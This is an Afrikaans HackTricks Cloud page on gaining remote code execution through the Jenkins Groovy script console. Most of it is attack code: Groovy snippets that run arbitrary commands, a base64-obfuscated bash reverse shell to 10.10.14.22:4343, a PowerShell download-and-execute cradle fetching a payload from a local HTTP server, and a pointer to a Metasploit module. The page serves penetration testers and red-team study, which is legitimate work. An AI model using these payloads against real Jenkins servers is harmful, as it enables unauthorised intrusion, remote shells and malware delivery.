HackTricks CloudJenkins RCE met Groovy Skrip
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Jenkins RCE met Groovy Skrip
Dit is minder luidrugtig as om ’n nuwe projek in Jenkins te skep
- Gaan na path_jenkins/script
- Binne die tekskas, stel die skrip voor
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
Jy kan ’n opdrag uitvoer met: cmd.exe /c dir
In linux kan jy doen: "ls /".execute().text
As jy aanhalings en enkele aanhalings binne die teks moet gebruik, kan jy “”“PAYLOAD”“” (drie dubbele aanhalings) gebruik om die payload uit te voer.
Nog ’n nuttige groovy script is (vervang [INSERT COMMAND]):
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Omgekeerde dop in linux
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Reverse shell in windows
Jy kan ’n HTTP-bediener met ’n PS reverse shell voorberei en Jeking gebruik om dit af te laai en uit te voer:
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Skrip
Jy kan hierdie proses outomatiseer met hierdie skrip.
Jy kan MSF gebruik om ’n omgekeerde skulp te kry:
msf> use exploit/multi/http/jenkins_script_console
Tip
Leer & oefen AWS Hacking:
Leer & oefen GCP Hacking:
Leer & oefen Az Hacking:Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.